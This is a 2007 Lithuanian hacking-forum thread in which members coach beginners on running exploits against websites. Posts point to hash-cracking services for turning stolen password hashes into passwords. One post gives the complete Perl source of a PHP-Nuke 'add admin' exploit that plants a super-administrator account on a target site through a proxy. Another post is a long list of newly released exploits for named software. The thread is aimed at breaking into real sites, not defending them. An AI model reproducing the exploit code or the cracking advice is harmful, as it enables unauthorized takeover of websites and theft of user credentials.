Exploit

Hakeriai dalinkitės patirtimi
Skelbti atsakymą
Žinutė
Autorius
DeMO
nuolatinis dalyvis
nuolatinis dalyvis
Pranešimai: 34
Užsiregistravo: 2007 01 09 15:13

#76 Standartinė DeMO » 2007 01 09 21:03

^Paulius^ rašė:2 klausimai:
Smulkiai isdestyk kaip viska darai.
Is kur gavai eksploita?
Nes yra 2 galimybes:
Kazka neteisingai darai.
Eksploitas su apsauga.
Exploita gavau.. hm čia buvo temoje kažkoks. (http://www.rst.void.ru/download/r57ipb2.txt)
O kaip ten kompiliuoti reikėjo ji? :roll:


Gabūt exploitas blogas, arba išviso ne tą paemiau.. :roll:

O darau štai kaip viska:

Paveikslėlis

Vartotojo avataras
nVIDIA
jaunasis rašytojas
jaunasis rašytojas
Pranešimai: 52
Užsiregistravo: 2006 12 04 08:47
Miestas: Lithuania

#77 Standartinė nVIDIA » 2007 01 10 16:08

na sita galiu pasakyt cia pearl exploitas jo kompilint nereikia jis iskart buna pl failas kuri galima naudot

DeMO
nuolatinis dalyvis
nuolatinis dalyvis
Pranešimai: 34
Užsiregistravo: 2007 01 09 15:13

#78 Standartinė DeMO » 2007 01 10 18:32

Bet tai taip pagalvojau, jei ir viskas pabvyks aš gausiu hash'ą bet ne slaptažodį.. taip? O tai koks man tolkas iš hash'o jei aš vistiek jo niekaip neiškoduosiu.. :shock: :roll:

Vartotojo avataras
DF
profesionalas
profesionalas
Pranešimai: 2979
Užsiregistravo: 2005 08 14 10:54

#79 Standartinė DF » 2007 01 13 13:53

z-sister rašė:Bet tai taip pagalvojau, jei ir viskas pabvyks aš gausiu hash'ą bet ne slaptažodį.. taip? O tai koks man tolkas iš hash'o jei aš vistiek jo niekaip neiškoduosiu.. :shock: :roll:
O kodėl tu manai kad Hasho neishkoduosi?
Pasinaudok tuom kas tai padarys...
www.milw0rm.com/cracker
Kai bobu nera - Buna blogai, Bet kai bobu yra - buna dar blogiau..Ishvadas daryk pats.

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai: 4469
Užsiregistravo: 2005 03 18 21:13
Susisiekti:

#80 Standartinė GODhack » 2007 01 13 17:54

z-sister rašė:
^Paulius^ rašė:2 klausimai:
Smulkiai isdestyk kaip viska darai.
Is kur gavai eksploita?
Nes yra 2 galimybes:
Kazka neteisingai darai.
Eksploitas su apsauga.
Exploita gavau.. hm čia buvo temoje kažkoks. (http://www.rst.void.ru/download/r57ipb2.txt)
O kaip ten kompiliuoti reikėjo ji? :roll:


Gabūt exploitas blogas, arba išviso ne tą paemiau.. :roll:

O darau štai kaip viska:

Paveikslėlis
I tavo klausima puikiai atsako paveikslelis, tiesiog atidziai paskaitinek ka raso.
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

DeMO
nuolatinis dalyvis
nuolatinis dalyvis
Pranešimai: 34
Užsiregistravo: 2007 01 09 15:13

#81 Standartinė DeMO » 2007 01 13 21:43

Na čia kažkas su 134 eilute.. bet tai dabar reikia skaičiuoti jas.. :lol:

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai: 4469
Užsiregistravo: 2005 03 18 21:13
Susisiekti:

#82 Standartinė GODhack » 2007 01 14 02:50

Nea jei naudoji normalu redaktoriu teksto ten jau buna sunumeruota arba persoka kur reik is kart.
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

DeMO
nuolatinis dalyvis
nuolatinis dalyvis
Pranešimai: 34
Užsiregistravo: 2007 01 09 15:13

#83 Standartinė DeMO » 2007 01 14 13:08

Na va radau.. Štai kas ten parašyta:

PeerPort => "80");

Tai čia kažkas su portais? kas jam nepatinka? :roll:

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai: 4469
Užsiregistravo: 2005 03 18 21:13
Susisiekti:

#84 Standartinė GODhack » 2007 01 14 13:38

Sunku ka pasakyti apie eilute nezinant konteksto, bet speju cia elementari sintakses klaida.
Ir neprasyk kad taisyciau: mokykis perl :P
Arba ieskok exploitu be klaidu.

Ir tiesa kai rasei:
cd ..
cd ..
cd perl
cd bin
Cia atsispindi mastymas pagal windows langus, koncoleje tokia poezija nera butina.
Tai galima susmaukt viska i viena komanda tokia:
cd c:\perl\bin
Ismokes geriau tokius dalykus tiesiog sutaupysi laiko ir pajausi, kad su komanine eilute net greiciau nei su langinem.
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

Vartotojo avataras
koksas
jaunasis rašytojas
jaunasis rašytojas
Pranešimai: 73
Užsiregistravo: 2006 09 06 16:23

#85 Standartinė koksas » 2007 01 20 13:49

Kodas: Pasirinkti visus

#!/usr/bin/perl
use LWP::UserAgent;

print "========================================\n";
print " PHP-NUKE all versions add admin exploit\n";
print "    Exploit coded by matrix_killer\n";
print "     Greetz to all omega-team members\n";
print "     See the sourece for more information\n";
print "========================================\n";


print "Enter host: "; #example:www.host.org

my $host=<STDIN>;

chomp ($host);

print "Enter username: "; #example:Lamer

my $user=<STDIN>;

chomp ($user);

print "Enter pass: "; #example:lamer

my $pass=<STDIN>;

chomp ($pass);

print "Enter base64 username and md5 hash: ";

my $base64=<STDIN>;

chomp ($base64);


my $ua = new LWP::UserAgent;
$ua->proxy(['http'] => 'http://192.168.166.167:6588'); #setup here the proxy and the port
#Change the base64 text to the base 64 username and password
my $xpl="http://$host/admin.php?op=AddAuthor&add_aid=$user&add_name=God&add_pwd=$pass&add_email=hacked@rooted.com&add_radminsuper=1&admin=$base64";

my $res = $ua->request(new HTTP::Request POST => $xpl);
print "DONE !!! Now go to $host/admin.php and login as $user for username and $pass for password\n";

#For questions send me a e-mail to matrix_k@abv.bg
#I'm not responsible for the damage that you will make with this exploit.The exploit is wrighten for education purposes only !
PHP-nuke exploitas visom versijom tik nesuprantu vienos eilutes kuria reik suvest

Kodas: Pasirinkti visus

print "Enter base64 username and md5 hash: ";
Galit kas paaiskint ka ce suvest?

Vartotojo avataras
^Paulius^
ultra dalyvis
ultra dalyvis
Pranešimai: 718
Užsiregistravo: 2006 10 02 13:52
Miestas: Kaunas
Susisiekti:

#86 Standartinė ^Paulius^ » 2007 01 20 14:54

Manau, kad username'a ir hash'a. :)

Vartotojo avataras
koksas
jaunasis rašytojas
jaunasis rašytojas
Pranešimai: 73
Užsiregistravo: 2006 09 06 16:23

#87 Standartinė koksas » 2007 01 24 22:54

Kas tas hashas?

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai: 4469
Užsiregistravo: 2005 03 18 21:13
Susisiekti:

#88 Standartinė GODhack » 2007 01 25 00:59

Koduotas tekstas zargoniskai vadinamas hashu.
md5 algoritmu uzkoduotas zodis == md5 hashas
Trumpiau.
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

Vartotojo avataras
^Paulius^
ultra dalyvis
ultra dalyvis
Pranešimai: 718
Užsiregistravo: 2006 10 02 13:52
Miestas: Kaunas
Susisiekti:

#89 Standartinė ^Paulius^ » 2007 01 25 13:09

O kadangi numatau sekanti klausima, tai iskart parasau ir atsakyma:
Hash'as atkoduojamas cia:
http://www.milw0rm.com/cracker/
Arba su Passwords Pro programa. :D

Vartotojo avataras
Laurynas
administratorius
administratorius
Pranešimai: 2011
Užsiregistravo: 2001 12 06 09:51
Miestas: Vilnius

#90 Standartinė Laurynas » 2007 01 28 16:40

Nauji eksploitai:

2007-01-06 Coppermine Photo Gallery <= 1.4.10 Remote SQL Injection Exploit
2007-01-05 iG Calendar 1.0 (user.php id variable) Remote SQL Injection Vulnerability
2007-01-05 iG Shop 1.0 (eval/sql injection) Multiple Remote Vulnerabilities
2007-01-05 Adobe Reader Universal XSS Vulnerability
2007-01-05 CA BrightStor ARCserve (tapeeng.exe) Remote Buffer Overflow Exploit
2007-01-05 Mac OS X 10.4.8 DiskManagement BOM Local Privilege Escalation Exploit
2007-01-05 Mac OS X 10.4.8 DiskManagement BOM (cron) Privilege Escalation Exploit
2007-01-05 QUOTE&ORDERING SYSTEM 1.0 (ordernum) Multiple Vulnerabilities
2007-01-04 Acunetix WVS <= 4.0 20060717 HTTP Sniffer Component Remote DoS
2007-01-04 Aratix <= 0.2.2b11 (inc/init.inc.php) Remote File Include Vulnerability
2007-01-04 iLife iPhoto Photocast (XML title) Remote Format String PoC
2007-01-04 DigiRez <= 3.4 (book_id) Remote SQL Injection Exploit
2007-01-03 Microsoft Vista (NtRaiseHardError) Privilege Escalation Exploit
2007-01-03 VLC Media Player 0.8.6 (udp://) Format String Exploit PoC (ppc)
2007-01-03 VLC Media Player 0.8.6 (udp://) Format String Exploit (x86)
2007-01-03 Apple Quicktime (rtsp URL Handler) Buffer Overflow Exploit (win2k)
2007-01-03 LocazoList <= 2.01a beta5 (subcatID) Remote SQL Injection Vulnerability
2007-01-03 E-SMARTCART 1.0 (product_id) Remote SQL Injection Vulnerability
2007-01-03 VerliAdmin <= 0.3 (language.php) Local File Inclusion Exploit
2007-01-03 Simple Web Content Management System Remote SQL Injection Exploit
2007-01-03 Apple Quicktime <= 7.1.3 (HREFTrack) Cross-Zone Scripting Exploit
2007-01-01 MDForum <= 2.0.1 (PNSVlang) Remote Code Execution Exploit
2007-01-01 Rediff Bol Downloader (ActiveX Control) Execute Local File Exploit
2007-01-01 Bubla <= 0.9.2 (bu_dir) Multiple Remote File Include Vulnerabilities
2007-01-01 RBlog 1.0 (admin.mdb) Remote Password Disclosure Vulnerablity
2007-01-01 Vizayn Haber (haberdetay.asp id variable) SQL Injection Vulnerability
2007-01-01 autoDealer <= 2.0 (detail.asp iPro) Remote SQL Injection Vulnerability
2007-01-01 Formbankserver 1.9 (Name) Directory Transversal Vulnerability
2007-01-01 Apple Quicktime (rtsp URL Handler) Stack-based Buffer Overflow PoC
2007-01-01 WWWBoard 2.0 (passwd.txt) Remote Password Disclosure Vulnerablity
2007-01-01 newsCMSlite (newsCMS.mdb) Remote Password Disclosure Vulnerablity
2007-01-01 MS Windows NtRaiseHardError Csrss.exe-winsrv.dll Double Free
2007-01-01 Macromedia Shockwave 10 (SwDir.dll) Internet Explorer Denial of Service
2007-01-01 Macromedia Flash 8 (Flash8b.ocx) Internet Explorer Denial of Service
2007-01-01 QK SMTP <= 3.01 (RCPT TO) Remote Buffer Overflow Exploit (pl)
2007-01-01 TaskTracker <= 1.5 (Customize.asp) Remote Add Administrator Exploit

2006-12-24 File Upload Manager <= 1.0.6 (detail.asp) Remote SQL Injection Exploit
2006-12-24 Newsletter MX <= 1.0.2 (ID) Remote SQL Injection Exploit
2006-12-24 Ultimate PHP Board <= 2.0b1 (chat/login.php) Code Execution Exploit
2006-12-24 Pagetool CMS <= 1.07 (pt_upload.php) Remote File Include Vulnerability
2006-12-24 Ananda Real Estate <= 3.4 (agent) Remote SQL Injection Vulnerability
2006-12-24 HLStats <=1.34 (hlstats.php) Remote SQL Injection Exploit
2006-12-23 3editor CMS <= 0.42 (index.php) Local File Include Vulnerability
2006-12-23 Calendar MX BASIC <= 1.0.2 (ID) Remote SQL Injection Vulnerability
2006-12-23 Enthrallweb eClassifieds 1.0 Remote User Pass Change Exploit
2006-12-23 Enthrallweb eCoupons 1.0(myprofile.asp) Remote Pass Change Exploit
2006-12-23 Enthrallweb eNews 1.0 Remote User Pass Change Exploit
2006-12-22 KISGB <= 5.1.1 (authenticate.php) Remote File Include Vulnerability
2006-12-22 EternalMart Guestbook 1.10 (admin/auth.php) Remote Inclusion Vuln
2006-12-22 Open Newsletter <= 2.5 Multiple Remote Vulnerabilities Exploit
2006-12-21 DREAM FTP Server 1.0.2 (PORT) Remote Denial of Service Exploit
2006-12-21 PowerClan <= 1.14a (footer.inc.php) Remote File Include Vulnerability
2006-12-21 Http explorer Web Server 1.02 Directory Transversal Vulnerability
2006-12-21 Ixprim CMS 1.2 Remote Blind SQL Injection Exploit
2006-12-21 inertianews 0.02b (inertianews_main.php) Remote Include Vulnerability
2006-12-21 MKPortal M1.1.1 (Urlobox) Cross Site Request Forgery Vulnerability
2006-12-21 XM Easy Personal FTP Server 5.2.1 (USER) Format String DoS Exploit
2006-12-20 Valdersoft Shopping Cart 3.0 Multiple Remote File Include Vulnerabilities
2006-12-20 TextSend <= 1.5 (config/sender.php) Remote File Include Vulnerability
2006-12-20 RealPlayer 10.5 (ActiveX Control) Denial of Service Exploit
2006-12-20 MS Windows (MessageBox) Memory Corruption Local Denial of Service
2006-12-20 PHP Advanced Transfer Manager <= 1.30 Source Code Disclosure Exploit
2006-12-19 WinFtp Server 2.0.2 (PASV) Remote Denial of Service Exploit
2006-12-19 PHPUpdate <= 2.7 extract() Auth Bypass / Shell Inject Exploit
2006-12-19 KDE 3.5 (libkhtml) <= 4.2.0 / Unhandled HTML Parse Exception Exploit
2006-12-19 Paristemi 0.8.3b (buycd.php) Remote File Include Vulnerability
2006-12-19 phpProfiles <= 3.1.2b Multiple Remote File Include Vulnerabilities
2006-12-19 PHPFanBase 2.x (protection.php) Remote File Include Vulnerability
2006-12-19 cwmVote 1.0 (archive.php) Remote File Include Vulnerability
2006-12-19 Oracle <= 9i / 10g File System Access via utl_file Exploit
2006-12-19 cwmCounter 5.1.1 (statistic.php) Remote File Include Exploit
2006-12-19 Hewlett-Packard FTP Print Server <= 2.4.5 Buffer Overflow (PoC)
2006-12-19 Intel 2200BG 802.11 Beacon frame Kernel Memory Corruption Exploit
2006-12-19 DeepBurner 1.8.0 .dbr File Parsing Buffer Overflow Exploit
2006-12-19 Burak Yilmaz Download Portal (down.asp) SQL Injection Vulnerability
2006-12-19 cwmExplorer 1.0 (show_file) Source Code Disclosure Vulnerability
2006-12-18 Azucar CMS <= 1.3 (admin/index_sitios.php) File Inclusion Vulnerability
2006-12-18 VerliAdmin <= 0.3 (index.php) Remote File Include Exploit
2006-12-18 MS Office Outlook Recipient Control (ole32.dll) Denial of Service Exploit
2006-12-18 wget <= 1.10.2 (Unchecked Boundary Condition) Denial of Service Exploit
2006-12-18 RateMe <= 1.3.2 (main.inc.php) Remote File Include Vulnerability
2006-12-18 Uploader & Downloader 3.0 (id_user) Remote SQL Injection Vulnerability
2006-12-17 Star FTP Server 1.10 (RETR) Remote Denial of Service Exploit
2006-12-16 extreme-fusion <= 4.02 Remote Code Execution Exploit
2006-12-16 Bandwebsite <= 1.5 (Login) Remote Add Admin Exploit
2006-12-16 mxBB Module WebLinks <= 2.05 Remote Inclusion Vulnerability
2006-12-16 mxBB Module Charts <= 1.0.0 Remote File Inclusion Vulnerability
2006-12-16 mxBB Module Meeting <= 1.1.2 Remote File Inclusion Vulnerability
2006-12-15 OpenLDAP <= 2.4.3 (KBIND) Remote Buffer Overflow Exploit
2006-12-15 Sambar FTP Server 6.4 (SIZE) Remote Denial of Service Exploit
2006-12-15 Windows Media Player 9/10 (MID File) Denial Of Service Exploit
2006-12-15 GNU InetUtils ftpd 1.4.2 (ld.so.preload) Remote Root Exploit
2006-12-14 yaplap <= 0.6.1b (ldap.php) Remote File Include Exploit
2006-12-14 AR Memberscript (usercp_menu.php) Remote File Include Vulnerability
2006-12-14 Kerio MailServer 6.2.2 preauth Remote Denial of Service PoC
2006-12-13 Crob FTP Server 3.6.1 build 263 (LIST/NLST) Denial of Service Exploit
2006-12-13 PhpMyCms <= 0.3 (basic.inc.php) Remote File Include Vulnerability
2006-12-13 ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC
2006-12-13 MS Internet Explorer 7 (DLL-load hijacking) Code Execution Exploit PoC
2006-12-12 mxBB Module mx_modsdb 1.0 Remote File Include Vulnerability
2006-12-12 Microsoft Word Document Code Execution Proof of Concept
2006-12-12 BLOG:CMS <= 4.1.3 (NP_UserSharing.php) Remote Inclusion Vulnerability
2006-12-12 mxBB Module kb_mods <= 2.0.2 Remote Inclusion Vulnerabilities
2006-12-12 mxBB Module newssuite 1.5 Remote File Inclusion Exploit
2006-12-11 Filezilla FTP Server <= 0.9.21 (LIST/NLST) Denial of Service Exploit
2006-12-11 D-Link DWL-2000AP 2.11 (ARP Flood) Remote Denial of Service Exploit
2006-12-11 Golden FTP server 1.92 (USER/PASS) Heap Overflow PoC
2006-12-11 mxBB Module ErrorDocs 1.0 (common.php) Remote Inclusion Vulnerability
2006-12-11 mxBB Module mx_profilecp 0.91 Remote File Include Vulnerability
2006-12-11 mxBB Module Activity Games 0.92 Remote File Include Exploit
2006-12-11 Barman 0.0.1r3 (interface.php) Remote File Include Vulnerability
2006-12-10 phpAlbum <= 0.4.1 Beta 6 (language.php) Local File Inclusion Exploit
2006-12-09 MS Windows DNS Resolution Remote Denial of Service PoC (MS06-041)
2006-12-09 Filezilla FTP Server 0.9.20b/0.9.21 (STOR) Denial of Service Exploit
2006-12-09 TorrentFlux 2.2 (downloaddetails.php) Local File Disclosure Exploit
2006-12-09 TorrentFlux 2.2 (maketorrent.php) Remote Command Execution Exploit
2006-12-09 mxBB Module Profile CP 0.91c Remote File Include Vulnerability
2006-12-09 Gizzar <= 03162002 (index.php) Remote File Include Vulnerability
2006-12-09 Fantastic News 2.1.4 (news.php) Remote SQL Injection Exploit
2006-12-09 SpotLight CRM 1.0 (login.asp) Remote SQL Injection Vulnerability
2006-12-09 Request For Travel 1.0 (product) Remote SQL Injection Vulnerability
2006-12-09 HR Assist <= 1.05 (vdateUsr.asp) Remote Login ByPass Vulnerability
2006-12-08 Tucows Client Code Suite (CSS) <= 1.2.1015 File Include Vulnerability
2006-12-08 CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability
2006-12-08 paFileDB 3.5.2/3.5.3 Remote Login Bypass SQL Injection Vulnerability
2006-12-08 ThinkEdit 1.9.2 (render.php) Remote File Inclusion Vulnerability
2006-12-07 J-OWAMP Web Interface <= 2.1b (link) Remote File Include Exploit
2006-12-06 Phorum <= 3.2.11 (common.php) Remote File Include Vulnerability
2006-12-04 cutenews aj-fork <= 167f (cutepath) Remote File Include Vulnerability
2006-12-04 F-Prot Antivirus 4.6.6 (ACE) Denial of Service Exploit
2006-12-04 F-Prot Antivirus 4.6.6 (CHM) Heap Overflow Exploit PoC
2006-12-03 AT-TFTP <= 1.9 (Long Filename) Remote Buffer Overflow Exploit
2006-12-03 Envolution <= 1.1.0 (PNSVlang) Remote Code Execution Exploit
2006-12-03 QuickCart 2.0 (categories.php) Local File Inclusion Exploit
2006-12-03 php-revista <= 1.1.2 (adodb) Multiple Remote File Include Vulnerabilities
2006-12-02 BBS E-Market Professional (Path Disclosure/Include) Multiple Vulns
2006-12-02 Simple File Manager 0.24a Multiple Remote Vulnerabilities
2006-12-02 awrate.com Message Board 1.0 (search.php) Remote Include Vulnerability
2006-12-02 mxBB Module mx_tinies <= 1.3.0 Remote File Include Vulnerability
2006-12-02 PHP Upload Center 2.0 (activate.php) File Include Vulnerabilities
2006-12-01 WikyBlog 1.3.2 (include/WBmap.php) Local File Inclusion Exploit
2006-12-01 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Exploit
2006-12-01 eV!Lz Clanportal [DZCP] <= 1.3.6 Arbitrary File Upload Vulnerability
2006-12-01 Invision Community Blog Mod 1.2.4 SQL Injection Vulnerability
2006-12-01 ContentServ 4.x (admin/FileServer.php) File Disclosure Vulnerability
2006-12-01 MS Windows spoolss GetPrinterData() Remote DoS Exploit (0day)
2006-12-01 BlazeVideo HDTV Player <= 2.1 Malformed PLF Buffer Overflow PoC
2006-12-01 Ultimate HelpDesk (XSS/Local File Disclosure) Vulnerabilities

2006-11-30 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Exploit
2006-11-30 Acer LunchApp.APlunch (ActiveX Control) Command Execution Exploit

Skelbti atsakymą

Grįžti į

Dabar prisijungę

Vartotojai naršantys šį forumą: 1 ir 0 svečias(ių)